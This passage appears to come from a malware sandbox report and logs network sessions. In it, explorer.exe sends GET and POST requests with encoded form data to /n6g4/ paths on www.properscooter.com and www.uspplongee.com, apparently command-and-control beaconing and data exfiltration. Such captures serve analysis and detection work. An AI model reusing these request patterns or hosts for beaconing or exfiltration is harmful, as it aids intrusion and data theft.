qqGwSIRSjVx0o8pxPadc-Zpp1q6WNGrWlAC19yX2L1WzRjsg2sQvhEN(aVE54E9gtvtgcOxww~pRzxTrIBg4pxx2pUQfo2gkElkI82l8ACaQcxRauOrSHaVsI3cR4b-diiPGuc2JTmi4D(gEuO0EzafzfvWbec9AepSMHGQDz~y1EUOVoysjFeIXYoG2_puiZl7XIxF6X0cr1aG3DClIhXd4MBHT5ovl1HRKTANPjOOTiDOF75XWZp5LTFmamtYkf~KFmCMMJ8GU7~NniGKZ6REeVxKmVFXFjnToN6WgKSeZkFjwNvwPr7Mm0LhMS(EsGcESjiqanDOOnzgSE0v0w1cd8ZLt05299MQPgq4UD7Y8xBYb3gXScPctLFEr1tSvvFa7-CaZ1iZEgaxJ79DecgprPrPXfGqK95i4vpBec3mGGO4l9UEH8(4vTenGsTo3jL9S7gXgctNDTe1VsCYx4XJQpfjwzVY6oZlg8X70aDx1YrZ7kDfp1Vk6TEE(IItKzlTXUAGhEBhHnuIVEZQvXrlG08njZpH30zqC2EKigU5YjV0pIS4JLglSSAElsslED55NKI6RVMx4GC3xnlaLSURTdlX16Co5drpHa8HpzcYLqFPE1GCt8v8AI8uhsYfUnFe17ds7Ec0hPuULXgh6DlfNanGW-~J(WNBNJhMPN~U2K9y9rhDznkW1oh5y-ExJP3kuhpJJskJDa5DjCLlxNrt5nG0~iMxqvdzjUeY6scEPViG(eQs2sX5OY~lBbXN52llVgATWCMPZWQk8y2ldIdOjE4hxi1EKCu45mOy5lmFpd(I8aPvpIktoaYRJI5HwM7vfMTdc6czc3hJncIlfTOgPU1K2RVSUs2YEEUllNzgNcbsxzxYPDUFPQ5qa3lmhmHYZS2XJurDXRQNwYXPBvVzpF~zhVbaC60cNbt-9J(D6fldc_RwftYAf-Fc13nxtAOafpRDf5nQD3F2i9lEefW-4p(ZXbSawkhyR3hndQHLLJIYotcs8PnOOznu75veFQG9LnEVlQICUkBTzz2kLJGNIL7nqqS_zjFYtR81wuSAqPtIo-Bk9AODeVxCoS~R1GO56iinEExhNkvL64S2CyhuvSujeCgvI76kHif0S2(jh87iop7IKDPMvPoklvX_mPyETvzRPimn4kNUe_2OasPFpQayADM7a9JarF4mze7D
May 14, 2022 15:30:34.409213066 CEST	9306	OUT	Data Raw: 38 67 38 69 74 78 32 65 50 72 32 36 48 4d 6f 65 4b 5a 68 28 47 62 47 4b 61 33 4a 28 52 47 34 44 45 63 6e 34 6d 68 5a 38 55 28 44 4f 44 56 75 39 6f 6b 6b 54 6e 53 78 37 6f 6e 4e 59 46 46 6d 79 37 72 71 58 4d 44 4d 75 35 51 59 54 6c 45 71 65 68 57 Data Ascii: 8g8itx2ePr26HMoeKZh(GbGKa3J(RG4DEcn4mhZ8U(DODVu9okkTnSx7onNYFFmy7rqXMDMu5QYTlEqehWHpzsupCjrFRidyktUy6L0wm2vHWSIfQ6QK9ZqI1T4AbwlMfiPQvVwwTZELk~dDI2Cz4YdnPYt1g9jzJt2g38-lpo-JhJLxudYnac3SInxNbs4RG1haVmmlRT-RK(X~ry-Oj1p74WFxRqVrXlEYXgQN46nQq2czFr2
May 14, 2022 15:30:34.409284115 CEST	9311	OUT	Data Raw: 71 4a 79 57 54 72 42 52 4f 50 65 36 48 32 44 4e 66 39 6f 6a 6b 30 71 31 69 69 78 56 32 5a 6d 7a 43 64 4d 44 6b 4d 30 45 35 57 78 77 61 5a 5f 79 5f 51 58 6f 6b 52 66 30 45 4a 5f 36 34 55 59 5a 58 4e 48 4d 61 79 35 62 69 4e 37 75 57 61 54 6c 56 32 Data Ascii: qJyWTrBROPe6H2DNf9ojk0q1iixV2ZmzCdMDkM0E5WxwaZ_y_QXokRf0EJ_64UYZXNHMay5biN7uWaTlV2_i_8tzv4Gtt~qygxLDlgqN33dMXBxkvdTAKZbXeF6xZHxcEQdtcuxMwu-Fdk_01T0g4hRpUD-NqrUASkilt24rG3gMBfvpaV056atd54AYALzf0I4V5pNX3lQ7fj3vxM60VF5tbjiFMbF9ohWQVerA2xE9ZNpRcwM
May 14, 2022 15:30:34.409496069 CEST	9316	OUT	Data Raw: 65 74 78 51 57 44 6f 33 6f 66 4d 63 5f 48 53 6d 63 37 33 4d 59 68 6f 67 69 5a 4c 70 31 49 79 4f 77 59 34 50 74 74 34 39 66 48 5a 72 72 36 37 76 34 31 52 48 51 54 66 42 6a 4a 62 42 6b 50 58 6a 58 68 30 53 48 33 66 68 52 76 53 4d 66 6a 4c 69 67 72 Data Ascii: etxQWDo3ofMc_HSmc73MYhogiZLp1IyOwY4Ptt49fHZrr67v41RHQTfBjJbBkPXjXh0SH3fhRvSMfjLigrzzbIq1j8JoKsZeQ(5eeQC(ZLzLeko3InCsuB9Gf(LBwg4K55ZrgwLdSvOUT8T6gO3~Dt5QKqiC6JYYBTf4xW2197dxUEfV-9Mb0MLeY1r0e8brum1s936b3wUhVTL0m2whgi-XpfYimp4erpsgQr3yQE8pP35Yqe5
May 14, 2022 15:30:34.409564972 CEST	9322	OUT	Data Raw: 4c 38 68 44 62 68 38 68 68 41 62 76 50 79 42 47 77 67 76 70 6e 63 51 28 66 72 6d 33 53 77 6b 55 73 58 4a 6e 62 4f 6f 4f 50 69 59 6c 54 48 6b 63 7a 50 6f 41 73 44 6d 36 78 4b 56 39 4b 45 5a 47 4c 33 5a 4e 39 44 32 53 47 58 47 71 79 30 49 66 75 70 Data Ascii: L8hDbh8hhAbvPyBGwgvpncQ(frm3SwkUsXJnbOoOPiYlTHkczPoAsDm6xKV9KEZGL3ZN9D2SGXGqy0IfupqGLXmSTh_nXWbqOoKyASWNRCPYVJ6XF7Ddb1NyCoOkKW7xOoSU4PElRlqD3evR5fI4Ut7xZGiHS2JMsVWfeWl3Rid~2DjrLKY3rg11RTEBPxZOsXSP9hqLM3BY01o6WW8pOqwIHqvq8LM1WCTHM53rti0olD2hFa4
May 14, 2022 15:30:34.409763098 CEST	9324	OUT	Data Raw: 33 74 6c 34 66 52 67 28 69 4e 5a 59 7a 66 37 72 71 48 32 6b 43 4b 6b 44 73 35 5f 71 71 30 4e 45 77 32 62 52 73 7e 4c 6b 6e 42 58 46 49 46 6f 57 78 79 79 34 4b 57 74 79 37 50 32 69 78 30 41 73 67 74 31 51 6f 72 68 4c 36 62 4b 63 37 30 5a 46 59 79 Data Ascii: 3tl4fRg(iNZYzf7rqH2kCKkDs5_qq0NEw2bRs~LknBXFIFoWxyy4KWty7P2ix0Asgt1QorhL6bKc70ZFYyi0-yN5SILSu3uAc4nW6Q3soxAQDbEzTvsd3rrUEyVtUR0PgEHV4GVadTqr4pQ5BqvILuXB1XQrGJAxJ5HWayj6iSA(8VFcCOKR4AZmhImnl4y8Q29pL2w1LuRiZZyr5V8waaKWUfKffhbD0s2zHnSPBkM67v6w5Mx
May 14, 2022 15:30:34.585072041 CEST	9325	IN	HTTP/1.1 400 Bad request content-length: 90 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49787	198.54.116.236	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:34.411441088 CEST	9324	OUT	GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1 Host: www.properscooter.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 14, 2022 15:30:34.596900940 CEST	9326	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Sat, 14 May 2022 13:30:34 GMT server: LiteSpeed location: https://www.properscooter.com/n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49796	38.34.163.59	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:40.130705118 CEST	9353	OUT	POST /n6g4/ HTTP/1.1 Host: www.uspplongee.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.uspplongee.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.uspplongee.com/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 58 47 30 4a 59 71 51 6e 50 58 6d 4f 6f 44 77 4e 56 54 49 49 67 38 72 48 33 5f 53 4e 6f 6e 45 4e 54 43 66 44 32 43 7e 74 33 74 77 59 73 59 56 75 33 39 67 4b 78 54 4a 58 56 39 7a 70 54 69 49 58 41 59 77 54 59 32 4d 76 6e 74 54 6c 33 50 4b 6d 6d 69 72 39 65 79 52 54 71 4e 68 49 66 39 74 6c 28 57 47 4d 41 56 53 59 32 2d 72 51 70 7a 43 30 69 57 34 67 57 79 30 64 6c 36 53 5a 76 46 5a 6a 58 47 46 32 66 4f 57 4d 4b 43 79 67 75 33 34 45 6b 42 35 64 70 43 38 6d 79 77 4d 6a 6c 6f 35 66 62 30 39 75 65 6f 4f 4e 45 2d 28 52 51 2d 5a 38 32 62 56 76 77 36 30 6b 7e 4b 34 73 7e 57 48 31 4d 75 53 79 79 66 37 6e 35 39 55 30 35 70 39 38 42 34 36 36 53 59 31 44 34 6b 43 4b 73 33 56 4c 69 4c 32 70 38 49 6a 44 4d 52 4a 37 36 41 35 4e 33 51 54 77 54 63 66 48 4c 71 54 35 63 43 6d 32 77 63 77 71 50 5f 4d 69 6f 6b 75 5a 78 77 51 48 32 79 62 32 32 2d 72 38 33 43 36 7a 43 65 73 55 6d 6c 49 48 7a 4c 79 30 39 38 6a 47 54 79 39 66 53 46 63 35 7a 50 72 4c 4e 55 66 4f 59 76 68 77 74 4e 4b 61 41 7a 34 32 6f 62 6c 53 5a 2d 33 58 42 75 4e 71 55 78 71 6d 4a 49 36 43 57 37 36 6c 37 6c 45 62 6d 6b 61 75 43 34 50 73 46 66 5a 68 6a 42 73 46 6d 57 6a 46 35 31 71 31 57 4a 4e 77 28 4f 4d 68 5a 53 74 64 38 48 77 63 28 37 72 4e 66 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=XG0JYqQnPXmOoDwNVTIIg8rH3_SNonENTCfD2C~t3twYsYVu39gKxTJXV9zpTiIXAYwTY2MvntTl3PKmmir9eyRTqNhIf9tl(WGMAVSY2-rQpzC0iW4gWy0dl6SZvFZjXGF2fOWMKCygu34EkB5dpC8mywMjlo5fb09ueoONE-(RQ-Z82bVvw60k~K4s~WH1MuSyyf7n59U05p98B466SY1D4kCKs3VLiL2p8IjDMRJ76A5N3QTwTcfHLqT5cCm2wcwqP_MiokuZxwQH2yb22-r83C6zCesUmlIHzLy098jGTy9fSFc5zPrLNUfOYvhwtNKaAz42oblSZ-3XBuNqUxqmJI6CW76l7lEbmkauC4PsFfZhjBsFmWjF51q1WJNw(OMhZStd8Hwc(7rNfQ).

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49798	38.34.163.59	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:40.300168991 CEST	9371	OUT	POST /n6g4/ HTTP/1.1 Host: www.uspplongee.com Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.uspplongee.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.uspplongee.com/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 58 47 30 4a 59 72 73 78 42 47 65 62 33 6a 39 62 58 68 6f 48 72 74 62 4a 77 4a 4f 43 30 53 4d 53 55 32 62 32 37 6d 32 35 32 76 67 4e 37 34 67 68 7a 2d 51 43 78 58 4e 2d 62 76 6d 67 43 54 30 55 41 59 34 78 59 32 49 76 6b 75 53 69 33 6f 4f 63 6e 48 28 79 53 79 52 76 34 64 68 52 56 70 4e 49 28 57 79 2d 41 55 72 44 31 4f 58 51 6f 51 71 30 7a 46 41 37 49 69 31 57 74 62 28 47 77 56 64 45 58 47 64 75 66 4f 36 4d 4b 79 75 67 75 57 49 46 77 32 56 61 67 79 38 6e 7e 51 4e 67 75 49 6b 35 62 30 77 42 65 74 32 4e 46 49 58 52 52 75 35 38 28 49 39 67 37 71 30 68 70 61 34 74 36 57 61 73 4d 75 4f 41 79 62 69 51 35 50 49 30 34 5a 39 39 57 5f 6e 48 58 4c 74 74 36 67 44 59 73 33 52 6d 69 66 58 30 38 4a 4f 59 46 45 4e 41 7e 6d 4d 71 33 56 6a 57 53 38 66 44 41 4b 53 74 63 43 6e 58 77 63 77 51 50 5f 38 69 6f 6e 4f 5a 78 54 59 48 30 53 62 78 39 75 71 57 79 43 36 6f 51 75 67 71 6d 6b 67 68 7a 4c 71 4b 39 4f 6e 47 54 69 4e 66 51 6b 63 34 6e 66 72 4e 4a 55 66 56 50 5f 68 31 74 4e 4c 50 41 33 6b 6d 6f 49 68 53 61 4f 62 58 4d 74 6c 71 57 42 71 6d 48 6f 36 41 44 4c 32 4c 37 6c 63 66 6d 68 32 55 42 4c 6a 73 46 4e 52 68 6b 6b 59 46 72 47 6a 46 32 56 72 69 48 70 63 67 30 4e 64 4f 65 45 4a 39 31 51 35 4f 28 72 36 5f 4b 63 69 54 52 38 34 6c 62 36 45 34 6a 49 28 57 34 33 78 36 63 73 38 68 45 74 79 45 69 77 6d 69 63 68 58 30 69 6a 6b 63 28 30 37 43 46 76 4c 36 4b 58 30 78 78 78 55 42 55 34 76 73 79 6a 6f 73 78 55 74 48 67 48 54 7a 49 62 36 52 4b 48 53 55 7a 70 6d 52 77 66 6c 4c 49 7a 41 6d 62 4e 51 65 7a 6b 4e 77 72 74 66 58 48 2d 66 55 57 36 77 69 75 6b 73 6a 57 41 57 4d 63 73 4f 7a 78 58 44 69 47 4a 46 66 5a 6e 78 75 30 46 33 5a 6a 50 4f 4b 7e 61 44 79 4d 76 6a 4b 50 36 34 47 37 76 45 68 4a 4e 37 6d 4d 64 46 70 55 32 76 5f 75 53 64 61 35 6e 6c 34 6f 4d 77 49 48 5f 54 48 5a 6c 6b 54 75 57 70 59 75 79 7a 58 52 64 54 47 6d 5a 54 52 74 39 47 44 71 6e 61 67 65 2d 33 59 54 61 69 67 43 72 62 43 54 7a 71 42 68 44 4f 6d 4f 69 52 4b 7e 4d 4a 61 61 31 66 73 56 6e 47 7a 54 38 37 61 70 53 57 4d 78 5a 30 62 28 7a 30 76 31 44 6a 35 44 6c 74 57 45 38 6e 59 47 4c 7e 35 66 78 4e 53 4e 52 62 74 6d 77 74 34 43 37 4c 76 66 69 57 47 5a 62 64 51 61 62 70 75 45 51 4a 62 73 57 36 63 78 33 74 4a 6e 57 64 30 6c 54 39 78 59 76 63 46 38 53 5a 47 51 62 6e 38 65 6c 61 65 6f 35 63 4c 79 31 67 5f 43 4f 73 56 7a 75 4b 52 64 57 42 73 76 47 31 68 6c 6b 35 4f 70 70 52 37 4d 45 73 51 4b 47 69 63 4c 77 45 35 53 62 6e 73 72 70 6b 42 7a 68 50 68 64 54 4a 70 63 39 37 45 7e 30 79 73 49 46 50 6f 39 73 32 68 4f 74 4d 68 73 6b 48 6b 75 33 66 34 46 47 76 4b 72 43 46 4a 39 75 66 59 43 59 4b 79 6b 69 47 39 49 71 50 54 74 65 38 57 75 68 70 6d 51 39 6d 6c 33 39 71 6a 66 74 59 56 73 58 30 51 67 32 43 58 28 6a 55 39 46 50 66 39 4c 51 49 63 75 50 77 64 52 67 48 49 39 69 65 35 78 48 77 72 28 42 41 4e 28 77 57 6c 5a 75 36 6b 6f 61 75 6f 28 77 68 62 5a 7a 6d 4d 6b 62 59 58 32 46 51 57 48 68 64 2d 54 79 68 31 41 4e 39 6b 71 53 7e 57 35 63 65 77 31 37 38 71 34 77 28 47 39 52 49 63 45 46 4b 38 63 45 31 61 32 6a 56 49 6e 5f 66 69 7e 35 77 45 58 79 64 74 43 42 7e 4b 51 6b 4a 43 49 48 38 65 63 58 6a 77 65 41 62 30 57 31 64 54 4e 55 77 58 53 43 41 57 41 4b 4d 55 65 64 50 46 46 55 77 6e 49 4f 54 75 66 4f 33 4c 42 54 6c 72 4b 71 71 6e 6e 6d 55 34 37 33 61 52 36 5f 47 36 5a 71 4e 62 47 44 65 4c 36 64 55 4f 59 34 62 38 78 64 61 57 4e 4c 46 65 79 41 59 4b 42 58 69 31 4b 53 30 67 5a 4a 54 37 35 45 7e 68 47 6f 77 6c 6a 71 46 4d 38 62 67 67 6c 58 37 4e 39 48 70 6d 69 5f 6e 50 4c 32 72 41 74 48 32 59 44 67 62 4d 48 56 36 66 55 4b 4c 41 76 2d 49 5f 35 76 68 66 62 6e 4c 51 33 38 6d 44 78 73 65 6c 38 67 4b 33 49 4e 4e 52 6a 4d 65 69 55 64 33 4f 49 53 43 34 6b 62 4a 69 38 52 58 65 56 71 6b 2d 51 63 50 33 70 45 42 73 69 47 4d 30 49 4b 4e 4b 53 51 39 42 65 6a 55 79 61 61 56 7a 61 33 44 5a 77 4b 45 61 32 7a 36 33 78 47 76 2d 6b 62 42 33 42 4e 69 67 61 6b 49 56 30 6c 79 4d 66 41 5a 78 64 42 6b 76 4d 52 79 57 33 61 45 47 62 61 57 4a 56 2d 43 38 44 47 5a 56 31 42 6e 58 78 44 79 65 62 59 31 50 54 54 6b 39 61 55 45 66 32 69 55 53 6e 5f 7e 66 68 74 6d 74 6e 72 67 76 43 58 6e 56 6e 45 64 6b 52 55 47 5f 38 33 65 71 66 47 47 Data Ascii: 3fe=XG0JYrsxBGeb3j9bXhoHrtbJwJOC0SMSU2b27m252vgN74ghz-QCxXN-bvmgCT0UAY4xY2IvkuSi3oOcnH(ySyRv4dhRVpNI(Wy-AUrD1OXQoQq0zFA7Ii1Wtb(GwVdEXGdufO6MKyuguWIFw2Vagy8n~QNguIk5b0wBet2NFIXRRu58(I9g7q0hpa4t6WasMuOAybiQ5PI04Z99W_nHXLtt6gDYs3RmifX08JOYFENA~mMq3VjWS8fDAKStcCnXwcwQP_8ionOZxTYH0Sbx9uqWyC6oQugqmkghzLqK9OnGTiNfQkc4nfrNJUfVP_h1tNLPA3kmoIhSaObXMtlqWBqmHo6ADL2L7lcfmh2UBLjsFNRhkkYFrGjF2VriHpcg0NdOeEJ91Q5O(r6_KciTR84lb6E4jI(W43x6cs8hEtyEiwmichX0ijkc(07CFvL6KX0xxxUBU4vsyjosxUtHgHTzIb6RKHSUzpmRwflLIzAmbNQezkNwrtfXH-fUW6wiuksjWAWMcsOzxXDiGJFfZnxu0F3ZjPOK~aDyMvjKP64G7vEhJN7mMdFpU2v_uSda5nl4oMwIH_THZlkTuWpYuyzXRdTGmZTRt9GDqnage-3YTaigCrbCTzqBhDOmOiRK~MJaa1fsVnGzT87apSWMxZ0b(z0v1Dj5DltWE8nYGL~5fxNSNRbtmwt4C7LvfiWGZbdQabpuEQJbsW6cx3tJnWd0lT9xYvcF8SZGQbn8elaeo5cLy1g_COsVzuKRdWBsvG1hlk5OppR7MEsQKGicLwE5SbnsrpkBzhPhdTJpc97E~0ysIFPo9s2hOtMhskHku3f4FGvKrCFJ9ufYCYKykiG9IqPTte8WuhpmQ9ml39qjftYVsX0Qg2CX(jU9FPf9LQIcuPwdRgHI9ie5xHwr(BAN(wWlZu6koauo(whbZzmMkbYX2FQWHhd-Tyh1AN9kqS~W5cew178q4w(G9RIcEFK8cE1a2jVIn_fi~5wEXydtCB~KQkJCIH8ecXjweAb0W1dTNUwXSCAWAKMUedPFFUwnIOTufO3LBTlrKqqnnmU473aR6_G6ZqNbGDeL6dUOY4b8xdaWNLFeyAYKBXi1KS0gZJT75E~hGowljqFM8bgglX7N9Hpmi_nPL2rAtH2YDgbMHV6fUKLAv-I_5vhfbnLQ38mDxsel8gK3INNRjMeiUd3OISC4kbJi8RXeVqk-QcP3pEBsiGM0IKNKSQ9BejUyaaVza3DZwKEa2z63xGv-kbB3BNigakIV0lyMfAZxdBkvMRyW3aEGbaWJV-C8DGZV1BnXxDyebY1PTTk9aUEf2iUSn_~fhtmtnrgvCXnVnEdkRUG_83eqfGGonijOQXYQVD5eT-ITe-mGQt6QxnTQfHnFVaN_8gc_RpTMqCUNB9y9cHUY9sRh044PqyF8fbP1cWc3bbYZqRh7jD21lJX5VKeF73wwTkJqUyU3rWRD(FZ3VYYxV-OUDs8BC86LaWF7eRr7rIN8I5B54x(DrfbuO3~aAtOm0SBlHU1SPswnVBjiybXU(pbI2bXU4Ks2yT9A~7cM8-3H6fbg4FwHPd4s8GR70Jk7AqZlQxJ1rmU_meHSET8OsSF-rrExLvV9ELzmEyZOPe6si4njph23Ym8TyDezRq8rV5pY5cokIb4efPVsLIhqMQ(foGIX4bkvWHgu~lPlG3gOhtlzs42YGly1Z5cUzwWOdamtHY~U1LVT9XktVxzQUIr4RbVRynTYIe1U5jeaVifM~4H16WunXBOADqt6(Z9RN8Oyo9bG2ecRHQwWo0yVKygOXfc4E-5quExgUlnB8Vcy7ASrn3Y4vRg6KOYwsRcRLXUIHLCeL1WVhBtafH62b-VBHDcQOSkU2kyQRvfbfN6mtXYhCKzKk3LyIX5pMENhxSZD2Mpah8mrUVv6rYbg0T5yzPORIOgqJl8Py_SgQOsmOmAf8N1wk-luYvjI27chCZxnM5aDs368emdWoXzQ7nGYERtBJETRaW(0LJLVy7U3UqGaqDTZMcnp70PqxXYBYwBZMhqSUX2tfyDViIP0PbDjRuPR2owPXVR5LGxk9IoHFODMvdK3LB3-0ZKuNRSAjKlhBGum(eraOa60eH35Gm~jR8hpoGsSMb1gZ4xUuZHzKBLau-T4zFwJGQgekvqoDK90GLbkEnks2TtGgx5uZuNie_xCIWXKuoJQ3HK9j2BAnpuoK-QfzzUPyAqXON5_JLwuMFqQL5NxWXJcNfdm65ZPz3jMaKRuQxdOV4Z3Cl4Q1naqrLyWR4~cWqwY32ep1TCOeUpYoBjnstDjTDVCqvEjMyou16Z08FhOYIypV2YCyqmc~pbg~mD6TnTORjJkoRLtAIeR8_m_MX(j2Da6p4rXMJ2fdfdyD_E8bX(2lT380efiTQSEeA2BW7X9~yn1PHIQLNnSpyYabxoCM4DQvSGaMTNZa3ROJptIwjZANdLY8aJMEac7DFCI0viGuoOu3paXCchg~9FUpYONeC5FlhVksMk5JYLRZimeAQQKd9Rg1MOhD5tAwQswI3QFr4J2F398iDwKKAo0aro3PU3In9p3ZctUHu5urUhyGlfAYa4aq_kesyUc1rzs1KZBRcl-5-byNcGuXNauIIv8o_S8heo8CAafaFqxJ2MrgVgsbHpydTxR(Tfy7R3WY1~RMXhkS8~JsciaN8EkzI7WgoRhO5zNsPs11fu8LE(iqa5bpOs45HhL1YZjEOVfDz9Nt_Khv9CR6L7zGKSeBWvVJw0HtHlxz896FDgAb74IZr3wcHAXTrLvh2rT7OLgx9AaDcEzvWNnhW6-p_S8SOBfQGAHK6HLgYtBaYw5ivUnDjyazuovHfLMbVoMjIxATD9_6NefDo2hPje85lO3QnAkecmd99Ys3_bV2G84bWnLDrKazG2hufpXhg1YqHqkGELrF-OOi3stqb97fPlDRye0iW7Dm_tFs6OjDn3wIvmTUVcFeO9FWdBMD3QsECHNzKMFml~1QDWa16l1ToU_9ok-nM(WlaeipcFfZbGFB61qIODrjGLgDF7Njkt0gZOJILN_R1jO5666(TJZfedWi4J6bc6R9Pco0MAUHESztSS1QpXrhLeZCMMPs73Us0AussVn3RXgGL0WW1xX76~D0KW_7EPZrgHvjquznUnUNaC32QgbNkmCz1WFZmHfFVU73_UcCWx4VEHjsn4b74sxGrBKUgBhbMqFxUxeSK~GnVp8NeJKrJgKkgJa4bqfEzHZVN9h79eTNyye3SLYlKkAWRqfY4W0bSPdO1W9tfNiZpZ8d7uCBM~Y1gblOWXABofYz_5CO0pACALizt1cR5m7C_JW5SoV1ZxrznO7Qf0KFY1ec1DlT10-23Yot75RjcNoqpnOdmD7fxCSfD7E63uyd1uHoLrcemSiVmUeoifnvkR_(47o9yHMMAIx4LV8Px1J(Xc_6SkfhpnmafcX6VAWoxfjoQhZTckQbiIWjR5ANKynf3(jpLZz72PLRzcOb8Ls3rsbzt(9QrZf8aPVVgtJntwQVP17UkqVcecX1ErjtW0c1vwDd3oxGZY9twGKyyNWMRzKbO748KLeZ3ScSH(iaAiGWl3z3h4qQ6QorU4RPMmNfwFgFhAed3CXjnuDk62cu-5uQQDSmOKscN0JPqGtTOADtDYDdXnq3m(1x6EkPv85rI2WFtigfUPC59whC4yj8oac2DZIiHt_zDFgvsC4Gw0ECvhFsVHhtNBN8dG1rdk1Vy1ON1lurticjAf-(U~vVUELUWnD3fAAB0~fHymNb9tC7Bxv~yF_rZJoOlpMs0P9QBdqnJzCcoK7wHOcvkAVdXURz3aoIQ7c8oc9MeTOm14ngEyCBZiKKhU7cXShZTB67J7-rB7jG_1tnG0sYIDpK6kCbQBjStPniRMn91L6tUsvmV0qWq4s0QFZHNdaNOEvUyV5j3JqPIEBon8BIOzF85TAN_RTwlVole8AwRfuvsMVF_CxPs8QV